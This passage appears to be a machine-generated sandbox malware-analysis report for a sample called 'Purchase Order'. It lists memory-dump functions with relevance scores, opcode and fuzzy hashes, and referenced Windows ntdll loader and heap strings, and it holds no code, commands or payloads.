                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                            • API String ID: 0-617086771
                                                            • Opcode ID: 776104fdc08c48a96310a9a60ad2b523f07e4169bbbd781180c2344b6ba0f376
                                                            • Instruction ID: 50ae7bb945c58f7710e6c835e65c565ec085008abbbe9dd6de76c1ab65a90a5d
                                                            • Opcode Fuzzy Hash: 776104fdc08c48a96310a9a60ad2b523f07e4169bbbd781180c2344b6ba0f376
                                                            • Instruction Fuzzy Hash: 1192BB71A042499FDB25CF68C440BAEBBF2FF48304F188459E899EB392D735EA41DB51
                                                            Function 01870770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-4253913091
                                                            • Opcode ID: e38f0daac9e371749b83131e97aa2eb77932a8b4621359413593ab1bae211e9e
                                                            • Instruction ID: fd188490260946f0a4daed8a4615810270ea78a46061a903f0a3890d619216e6
                                                            • Opcode Fuzzy Hash: e38f0daac9e371749b83131e97aa2eb77932a8b4621359413593ab1bae211e9e
                                                            • Instruction Fuzzy Hash: D4F18B7070060ADFEB25CF68C884B6AB7F6FB85704F148169E456DB392D734EA81CB91
                                                            Function 01886962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@
                                                            • API String ID: 0-1077428164
                                                            • Opcode ID: 49ae7d027245362413e5e9e7417c24200376c6049c80ec181a7f369c2e1eb5c2
                                                            • Instruction ID: 7f3b5dac36b5e231d4dff25daa0d2ee96ab7043ae4ba32f9505722fa095e4ae0
                                                            • Opcode Fuzzy Hash: 49ae7d027245362413e5e9e7417c24200376c6049c80ec181a7f369c2e1eb5c2
                                                            • Instruction Fuzzy Hash: 04C290716083459FE725DF28C880BABBBE5BF88714F14892DF989C7241E734DA45CB52
                                                            Function 0185A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            • API String ID: 0-2779062949
                                                            • Opcode ID: fa6cb2ec7355c32bfeab7e9ca15526d826a059eb5f360784ec614c820572f097
                                                            • Instruction ID: eb66fd8c933f8b176927a0b60deae46aa8dbecd24a990c91f070d89691d54acb
                                                            • Opcode Fuzzy Hash: fa6cb2ec7355c32bfeab7e9ca15526d826a059eb5f360784ec614c820572f097
                                                            • Instruction Fuzzy Hash: 15A147719116299BDB319B68CCC8BEAB7B8EF48700F1001EAEA09E7251D7359F85CF51
                                                            Function 01880BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018CA121
                                                            • Failed to allocated memory for shimmed module list, xrefs: 018CA10F
                                                            • LdrpCheckModule, xrefs: 018CA117
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-161242083
                                                            • Opcode ID: 2a8e45c9c97d1966827f2e29703cbe8616c2a821c240d88e599dde10698db3cc
                                                            • Instruction ID: e3a269290a43275b8ac0e931b9e8ded7ed22e6ad5831f5ac48572400218f7616
                                                            • Opcode Fuzzy Hash: 2a8e45c9c97d1966827f2e29703cbe8616c2a821c240d88e599dde10698db3cc
                                                            • Instruction Fuzzy Hash: D3719D71A00309DFDB29EF6CC981AAEB7B5FB84704F14406DE902E7251E734AB85CB51
                                                            Function 01870A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-1334570610
                                                            • Opcode ID: e87ebb10ced53f348d71558414460e805d0b7dd26e314a6dbb2295fd0c10743a
                                                            • Instruction ID: 8788a36e381b2294a5a1a39de484ed63e26acd706bde1029e7a051e42d0ccd33
                                                            • Opcode Fuzzy Hash: e87ebb10ced53f348d71558414460e805d0b7dd26e314a6dbb2295fd0c10743a
                                                            • Instruction Fuzzy Hash: 9D618F716043059FDB29DF28C480B6ABBE1FF46708F14855DE899CB296D770EA81CB91
                                                            Function 0189C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Failed to reallocate the system dirs string !, xrefs: 018D82D7
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018D82E8
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018D82DE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1783798831
                                                            • Opcode ID: f45a6b2167ad59f6e6a20e280519e2391756e29a351ddc5ba60ec0495f4dc5ea
                                                            • Instruction ID: a6968354c9c0551332414a61cb3eeb6037d68790f00a373b3f9590ae20f644c4
                                                            • Opcode Fuzzy Hash: f45a6b2167ad59f6e6a20e280519e2391756e29a351ddc5ba60ec0495f4dc5ea
                                                            • Instruction Fuzzy Hash: B941E271509305ABDB21EB6CD884B5F77E8EF44764F04492AF948E7254EB70DA008BA2
                                                            Function 0191C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • @, xrefs: 0191C1F1
                                                            • PreferredUILanguages, xrefs: 0191C212
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0191C1C5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            • Opcode ID: 8937a6c21c69054b3f531788a5164d9cf8266ca1a8b2748ca4ccb39133031803
                                                            • Instruction ID: 219b52ed2d69a19c8afe070115fb6e34b02bc69324f6a3ca60f167215a7acebf
                                                            • Opcode Fuzzy Hash: 8937a6c21c69054b3f531788a5164d9cf8266ca1a8b2748ca4ccb39133031803
                                                            • Instruction Fuzzy Hash: 3841747194020DEBDF11DAD8C841FEEB7BCAB14701F04456AEA09E7244D774DA858B51
                                                            Function 018F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            • Opcode ID: 9aa114e8e7a152adac99a1fcf103f456dafd6c92ab5d58c1cec7e7bfa0977ada
                                                            • Instruction ID: 2b5112020badd169df7854c8a2132122d0f022d4f4931d880b0d5399fa268d23
                                                            • Opcode Fuzzy Hash: 9aa114e8e7a152adac99a1fcf103f456dafd6c92ab5d58c1cec7e7bfa0977ada
                                                            • Instruction Fuzzy Hash: 68410431A006588BEB25DBE8C844BAEBBB8FF55344F14046EDB01EB781DB348B41CB12
                                                            Function 018E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018E4888
                                                            • LdrpCheckRedirection, xrefs: 018E488F
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 018E4899
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-3154609507
                                                            • Opcode ID: e4c75774998b1dd1c21f69890f612d4ca5cd462e32bd74e4fdab65251a014dd2
                                                            • Instruction ID: 9d2edeed81e258843b8abe8b31b1201ea1ddbc2a8dc096abcc38e362b1edb5b1
                                                            • Opcode Fuzzy Hash: e4c75774998b1dd1c21f69890f612d4ca5cd462e32bd74e4fdab65251a014dd2
                                                            • Instruction Fuzzy Hash: F441B032A043659BCB21CE6DD848A267BE5AF8B750F060559ED4DE7311D731DE00CBD1
                                                            Function 01870BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-2558761708
                                                            • Opcode ID: 7ce069af0a7394bc2bf171e5ad89652a3a0c01645ecd71c43d91ec97bbec887e
                                                            • Instruction ID: cfa4e748dce2e5db59cc3f988d50d48d1522091b87e0e62c1f259595ad520416
                                                            • Opcode Fuzzy Hash: 7ce069af0a7394bc2bf171e5ad89652a3a0c01645ecd71c43d91ec97bbec887e
                                                            • Instruction Fuzzy Hash: 4B11EE713181069FDB29CA18C480F3AF3A5EF82B1AF18816DF406CB252EB34EB41C791
                                                            Function 018E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpInitializationFailure, xrefs: 018E20FA
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018E2104
                                                            • Process initialization failed with status 0x%08lx, xrefs: 018E20F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2986994758
                                                            • Opcode ID: 3f54418a73d4ba3489ba70eedb5cb7aef3996814f39e7ba6fd9a2da122aaf783
                                                            • Instruction ID: 0b26bb4ee8b311a035c434272450d81cb8177351180f3544c05baf7020192db8
                                                            • Opcode Fuzzy Hash: 3f54418a73d4ba3489ba70eedb5cb7aef3996814f39e7ba6fd9a2da122aaf783
                                                            • Instruction Fuzzy Hash: 61F0A43564070C6BE724D64C9C46F993BA9EB41B54F540059F600FB285D6B4A7408B91
                                                            Function 018703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            • Opcode ID: cc3ed2705b98fb5c794a313f2d5726e6c06b9a775d08f22f6a111d69dfc08d76
                                                            • Instruction ID: e891bb7aa513c229ac11f48f27aa87c484ed365d8ff664ecaaecce38ae3cf0dc
                                                            • Opcode Fuzzy Hash: cc3ed2705b98fb5c794a313f2d5726e6c06b9a775d08f22f6a111d69dfc08d76
                                                            • Instruction Fuzzy Hash: 96710A71A0014A9FDB05DFA8C994BAEBBF8FF18704F154069E905E7251EB34EA41CB62
                                                            Function 0186A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrResSearchResource Enter, xrefs: 0186AA13
                                                            • LdrResSearchResource Exit, xrefs: 0186AA25
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                            • API String ID: 0-4066393604
                                                            • Opcode ID: 4ed48e7f7b93fc26a32335d3fe734f3c5966569b5450de1833b2bd0785f420b9
                                                            • Instruction ID: 1908eeeaf9a558e54dd3b3f9d9271cd5b896fb96e5d32e28be80c547f0212a4b
                                                            • Opcode Fuzzy Hash: 4ed48e7f7b93fc26a32335d3fe734f3c5966569b5450de1833b2bd0785f420b9
                                                            • Instruction Fuzzy Hash: 4BE17C71A00219AFEB268E9DD980BAEBBBAFF44714F14442AE901F7291D734DB41CB51
                                                            Function 0192A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction ID: 9876168fb5a62e5ecbb02f385946be8bb19e4b47a325f3d6b7db5c0983fc5d94
                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction Fuzzy Hash: 71C1E2322043529BE725CF28C840B2BBBE9BFD4719F084A2DF69ACB694D774D505CB42
                                                            Function 018DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • Opcode ID: 26816abe316882c86712819c2a07639249619b2ab42b019b7c55b1d5565da41f
                                                            • Instruction ID: 3c37c044adf7dc54fec39d6a97fb08f1a3ed937eeca892b39908fb99f5ecf0b7
                                                            • Opcode Fuzzy Hash: 26816abe316882c86712819c2a07639249619b2ab42b019b7c55b1d5565da41f
                                                            • Instruction Fuzzy Hash: 8B616E71E007199FDB24DFA8C881BAEBBB9FB44704F54406DE649EB291DB31EA40CB50
                                                            Function 019043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$MUI
                                                            • API String ID: 0-17815947
                                                            • Opcode ID: 8759a80b33daf4d7d8eba318f22e74e0431a22726d6faac210603c3cf41d945e
                                                            • Instruction ID: c88db7dbedebf7e124f4ee8fcff94165b5c40ce5b15edd6f0519fea8dc073fdf
                                                            • Opcode Fuzzy Hash: 8759a80b33daf4d7d8eba318f22e74e0431a22726d6faac210603c3cf41d945e
                                                            • Instruction Fuzzy Hash: D751F971E0021DAFEB11DFA9CC80AEEBBBDAB44754F100529E615F7290D631AA05CB61
                                                            Function 018604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • kLsE, xrefs: 01860540
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0186063D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                            • API String ID: 0-2547482624
                                                            • Opcode ID: e47435d5ccacbc34068a67daf1e396d6785b91bd87fc8c5391018ad7e6713bdd
                                                            • Instruction ID: a2eb22fc2258c512421b054d2119ddab49818795ec7a2c2f79e0cdf39616eb61
                                                            • Opcode Fuzzy Hash: e47435d5ccacbc34068a67daf1e396d6785b91bd87fc8c5391018ad7e6713bdd
                                                            • Instruction Fuzzy Hash: BF51D0715047468FD725EF68C4446A7BBE8AF84304F10483EFADAC7241E774DA45CB9A
                                                            Function 0186A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0186A309
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0186A2FB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            • Opcode ID: 269f4d349f87d1813255ade377f0c835fd7a31de7a71719fac87b3326db88498
                                                            • Instruction ID: ff4a1da4315093e61c8d7264f8355fbf41c63bd1e09a22e5732bb1d0f3e221d8
                                                            • Opcode Fuzzy Hash: 269f4d349f87d1813255ade377f0c835fd7a31de7a71719fac87b3326db88498
                                                            • Instruction Fuzzy Hash: 5341BE30A04649DBDB19CF5DC940B6ABBB9FF85704F1440A9EA00EB291E7B5DB40CB51
                                                            Function 0189A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            • API String ID: 2994545307-4008356553
                                                            • Opcode ID: e9f41f25089bf183b88bd52fd197aa702d3f05f9b8752f0e24289eb1aa31536f
                                                            • Instruction ID: 12fe8ee1d8e04a7128294c5c9d8fe80c962feb335101a51029c1228cdc79000b
                                                            • Opcode Fuzzy Hash: e9f41f25089bf183b88bd52fd197aa702d3f05f9b8752f0e24289eb1aa31536f
                                                            • Instruction Fuzzy Hash: ED0128B2244704AFD322DF14CD85F167BE8E784B16F098939B648C7590E374DA04CB86
                                                            Function 0186C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API String ID: 0-1339004836
                                                            • Opcode ID: 67867275d4b1806f6f904f7af4ec04b0e6603d0f6d74edf2b9a28eb41ba434e0
                                                            • Instruction ID: 3d953884617f53df3f24e98fe1b7ba4b33a2af5a23a560b9407827139cc8ecb4
                                                            • Opcode Fuzzy Hash: 67867275d4b1806f6f904f7af4ec04b0e6603d0f6d74edf2b9a28eb41ba434e0
                                                            • Instruction Fuzzy Hash: 79826B75E002588FEB25CFA9C880BEDBBB9BF48314F148169D999EB351D730AE41CB50
                                                            Function 018E6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 9d13db7a34bc0ec5353257f380f948b0f86d7c9d7bb955280467f0bcb9b22c35
                                                            • Instruction ID: 101a4d1b177f445791c259b3658b753fab20d2f4f412e68af36cf2c83d5cb898
                                                            • Opcode Fuzzy Hash: 9d13db7a34bc0ec5353257f380f948b0f86d7c9d7bb955280467f0bcb9b22c35
                                                            • Instruction Fuzzy Hash: C0915371A40219AFEB21EB99CD85FAE7BB9EF15B50F200065F600EB191E774EA00CB51
                                                            Function 0190E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 699f5f65a7a30301c98156b3062281a59f3bceb715b63f768fd1351ef02e5126
                                                            • Instruction ID: 68f96d2650ccd0f65e370b216dcc6a1a9e43d6054a4e0d1260a4dee32b6184a4
                                                            • Opcode Fuzzy Hash: 699f5f65a7a30301c98156b3062281a59f3bceb715b63f768fd1351ef02e5126
                                                            • Instruction Fuzzy Hash: EE918172901609BFDB23EBA9DC44FAFBB79EF85740F140819F509A7290E7749A01CB52
                                                            Function 0189A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API String ID: 0-1106856819
                                                            • Opcode ID: 39efddbf4ae73ed36641765d23b635e111de051b63f65dce85b4dc2014b97ebb
                                                            • Instruction ID: e2e8621b078ff9ad5ef5a18494259a0d6efd294f167238c74aa941259960a9d7
                                                            • Opcode Fuzzy Hash: 39efddbf4ae73ed36641765d23b635e111de051b63f65dce85b4dc2014b97ebb
                                                            • Instruction Fuzzy Hash: 487149B5E0030E9BDF29DF9CD5916ADBBB1BF88714F24812AE905E7241E7309A41CB60
                                                            Function 01904978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .mui
                                                            • API String ID: 0-1199573805
                                                            • Opcode ID: 5e5c1c30d89f191ad2ba4b03a6d309951d92261358c4fd4f3e44ede2e7f6fb46
                                                            • Instruction ID: db715e7b658f81864ae2186d47ed8db7c37c6f420e0d4dac2c90785a56668dbb
                                                            • Opcode Fuzzy Hash: 5e5c1c30d89f191ad2ba4b03a6d309951d92261358c4fd4f3e44ede2e7f6fb46
                                                            • Instruction Fuzzy Hash: 0C518472D0062A9FDF12DF99D840AAEBBB8AF08B10F054129EB15F7290D7749901CBE4
                                                            Function 0187E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API String ID: 0-1948896318
                                                            • Opcode ID: 7807f1050c3733bf4a05e7171a404b809979c25f427a5af00fd3f38d25140e71
                                                            • Instruction ID: b178b83c1e134fe9c4b14a2e1d99ddca11d8d6baffae07a02da90ef336076b88
                                                            • Opcode Fuzzy Hash: 7807f1050c3733bf4a05e7171a404b809979c25f427a5af00fd3f38d25140e71
                                                            • Instruction Fuzzy Hash: C24191725083429BD711DA79C980B6BB7E8EF88B58F44496DFA84D7140E774DB04C793
                                                            Function 018DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • Opcode ID: bf2c5be1b0232fc8aa265928051381a1f5462dfa61bcb655f5c1a4b273523177
                                                            • Instruction ID: 02b9e4d8a7543f4290ca23da9ca2478ee5b5e2ed54a7d4e92dda62c046c68c4e
                                                            • Opcode Fuzzy Hash: bf2c5be1b0232fc8aa265928051381a1f5462dfa61bcb655f5c1a4b273523177
                                                            • Instruction Fuzzy Hash: 3C4131B1D0022DABDB219A64CC85FDEB77CAB45714F0045A9EB08EB141DB709F89CFA5
                                                            Function 018F6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: ff20ade139b0485853ea31132dec1d00d9d607a12d49b87d607d4e335e4bc675
                                                            • Instruction ID: df9353802f941a9941f3d04471487477ca819d87de587feec5e9c61107316711
                                                            • Opcode Fuzzy Hash: ff20ade139b0485853ea31132dec1d00d9d607a12d49b87d607d4e335e4bc675
                                                            • Instruction Fuzzy Hash: 43312A31A007099BEB22DB6DC850BAE7BB8DF15704F64412CEA81EB282E775DE05CB50
                                                            Function 018DCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
